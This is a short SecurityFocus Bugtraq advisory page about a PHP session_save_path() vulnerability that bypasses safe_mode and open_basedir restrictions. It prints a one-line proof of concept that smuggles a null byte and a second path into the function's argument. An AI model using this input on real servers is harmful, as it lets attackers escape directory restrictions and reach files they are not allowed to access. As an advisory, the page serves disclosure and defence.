Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PHP Session.Save_Path() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability

Attackers may exploit these issues with standard PHP code.

The following proof of concept is available:

session_save_path("/DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS")







 

Privacy Statement
Copyright 2009, SecurityFocus